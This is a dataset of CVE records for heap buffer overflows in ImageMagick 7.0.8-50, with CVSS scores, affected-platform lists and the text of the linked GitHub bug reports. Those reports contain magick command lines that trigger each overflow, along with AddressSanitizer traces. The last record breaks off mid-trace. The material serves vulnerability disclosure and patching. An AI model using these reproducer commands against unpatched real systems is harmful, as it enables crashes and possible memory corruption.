"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/35c7032723d85eee7318ff6c82f031fa2666b773"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1609 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow at MagickCore/threshold.c:328:11 in AdaptiveThresholdImage.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -dispose Background "(" magick:netscape -lat 514x0-41 ")" "(" magick:granite -charcoal 3 -level 0%,125,0.328 ")" -combine -print "" tmp`
Here's ASAN log.
```
==22189==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x620000001090 at pc 0x7fd7e5dd4be2 bp 0x7ffd816c3a30 sp 0x7ffd816c3a28
READ of size 4 at 0x620000001090 thread T0
#0 0x7fd7e5dd4be1 in AdaptiveThresholdImage MagickCore/threshold.c:328:11
#1 0x7fd7e5386cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21
#2 0x7fd7e537bc78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#3 0x7fd7e53a1315 in CLIOption MagickWand/operation.c:5273:16
#4 0x7fd7e51e2a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#5 0x7fd7e51e3d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#6 0x7fd7e522dba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#7 0x526f95 in MagickMain utilities/magick.c:149:10
#8 0x5268e1 in main utilities/magick.c:180:10
#9 0x7fd7dfca4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x41b069 in _start (install/bin/magick+0x41b069)
Address 0x620000001090 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/threshold.c:328:11 in AdaptiveThresholdImage
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow at MagickCore/threshold.c:328:11 in AdaptiveThresholdImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1609/comments | 2 | 2019-06-21T06:02:04Z | 2019-07-08T01:48:56Z | https://github.com/ImageMagick/ImageMagick/issues/1609 | 459,024,141 | 1,609 |
CVE-2019-13298 | 2019-07-05T01:15:10.110 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/d4fc44b58a14f76b1ac997517d742ee12c9dc5d3"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1611"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1611 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 "(" magick:netscape -random-threshold 66x4 -resize 72%+20-45 ")" "(" magick:netscape -shear 40 -enhance ")" tmp`
Here's ASAN log.
```
=================================================================
==6928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7faaff40fa80 at pc 0x7fab0dddcb45 bp 0x7fff3e3ee2b0 sp 0x7fff3e3ee2a8
WRITE of size 4 at 0x7faaff40fa80 thread T0
#0 0x7fab0dddcb44 in SetPixelViaPixelInfo ./MagickCore/pixel-accessor.h:804:56
#1 0x7fab0ddf1234 in EnhanceImage MagickCore/enhance.c:1976:7
#2 0x7fab0d63a171 in CLISimpleOperatorImage MagickWand/operation.c:2284:21
#3 0x7fab0d632c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#4 0x7fab0d658315 in CLIOption MagickWand/operation.c:5273:16
#5 0x7fab0d499a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#6 0x7fab0d49ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#7 0x7fab0d4e4ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#8 0x526f95 in MagickMain utilities/magick.c:149:10
#9 0x5268e1 in main utilities/magick.c:180:10
#10 0x7fab07f5bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#11 0x41b069 in _start (install/bin/magick+0x41b069)
0x7faaff40fa80 is located 0 bytes to the right of 905856-byte region [0x7faaff332800,0x7faaff40fa80)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fab0ded3ed6 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fab0dc1c61c in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7fab0dc22901 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7fab0dc28bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28
#5 0x7fab0de87831 in SetImageStorageClass MagickCore/image.c:2627:10
#6 0x7fab0dde375f in EnhanceImage MagickCore/enhance.c:1891:7
#7 0x7fab0d63a171 in CLISimpleOperatorImage MagickWand/operation.c:2284:21
#8 0x7fab0d632c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#9 0x7fab0d658315 in CLIOption MagickWand/operation.c:5273:16
#10 0x7fab0d499a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7fab0d49ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7fab0d4e4ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7fab07f5bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow at MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1611/comments | 2 | 2019-06-21T06:07:48Z | 2019-07-08T01:49:17Z | https://github.com/ImageMagick/ImageMagick/issues/1611 | 459,025,805 | 1,611 |
CVE-2019-13299 | 2019-07-05T01:15:10.187 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/8187d2d8fd010d2d6b1a3a8edd935beec404dddc"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1610"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1610 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 "(" magick:netscape -monochrome ")" "(" magick:netscape +repage ")" -geometry 433%-80-57 -adjoin -evaluate-sequence Median tmp`
Here's ASAN log.
```
==30168==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7febb7ba1400 at pc 0x7febc5808632 bp 0x7ffd269baff0 sp 0x7ffd269bafe8
READ of size 4 at 0x7febb7ba1400 thread T0
#0 0x7febc5808631 in GetPixelChannel ./MagickCore/pixel-accessor.h:116:10
#1 0x7febc5805ff6 in EvaluateImages MagickCore/statistic.c:587:33
#2 0x7febc4e1a5bf in CLIListOperatorImages MagickWand/operation.c:4084:22
#3 0x7febc4e2435e in CLIOption MagickWand/operation.c:5279:14
#4 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#5 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#6 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#7 0x526f95 in MagickMain utilities/magick.c:149:10
#8 0x5268e1 in main utilities/magick.c:180:10
#9 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x41b069 in _start (install/bin/magick+0x41b069)
0x7febb7ba1400 is located 0 bytes to the right of 248832-byte region [0x7febb7b64800,0x7febb7ba1400)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7febc569fed6 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7febc53e861c in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7febc53ee901 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7febc53f4bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28
#5 0x7febc5653831 in SetImageStorageClass MagickCore/image.c:2627:10
#6 0x7febc54187e2 in AcquireImageColormap MagickCore/colormap.c:144:10
#7 0x7febc575d137 in AssignImageColors MagickCore/quantize.c:514:7
#8 0x7febc5753f38 in QuantizeImage MagickCore/quantize.c:2724:14
#9 0x7febc53ae56c in SetImageType MagickCore/attribute.c:1495:14
#10 0x7febc4e0cace in CLISimpleOperatorImage MagickWand/operation.c:2792:18
#11 0x7febc4dfec78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x7febc4e24315 in CLIOption MagickWand/operation.c:5273:16
#13 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x526f95 in MagickMain utilities/magick.c:149:10
#17 0x5268e1 in main utilities/magick.c:180:10
#18 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:116:10 in GetPixelChannel
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1610/comments | 6 | 2019-06-21T06:05:24Z | 2019-10-25T13:50:32Z | https://github.com/ImageMagick/ImageMagick/issues/1610 | 459,025,122 | 1,610 |
CVE-2019-13300 | 2019-07-05T01:15:10.250 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/a906fe9298bf89e01d5272023db687935068849a"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1586"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/5e409ae7a389cdf2ed17469303be3f3f21cec450"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1586 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a heap buffer overflow vulnerability in MagickCore/statistic.c:654:41 in .omp_outlined._debug__.10
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick "-black-point-compensation" "-interlace" "none" "(" "magick:rose" "-density" "302x531" ")" "(" "magick:granite" "+repage" ")" "-antialias" "-evaluate-sequence" "Log" ""`
This is about heap-buffer-overflow log using ASAN.
```
==27479==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000018800 at pc 0x0000006205ab bp 0x7ffd7a503310 sp 0x7ffd7a503308
WRITE of size 8 at 0x629000018800 thread T0
#0 0x6205aa in .omp_outlined._debug__.10 MagickCore/statistic.c:654:41
#1 0x621c5e in .omp_outlined..11 MagickCore/statistic.c:618:7
#2 0x7f79836bd452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7f79836771b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#4 0x7f79836782b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5)
#5 0x7f798366b7be in __kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be)
#6 0x61c9ca in EvaluateImages MagickCore/statistic.c:615:15
#7 0x13fcdb9 in CLIListOperatorImages MagickWand/operation.c:4081:22
#8 0x1406ec5 in CLIOption MagickWand/operation.c:5276:14
#9 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x531745 in MagickMain utilities/magick.c:149:10
#13 0x531091 in main utilities/magick.c:180:10
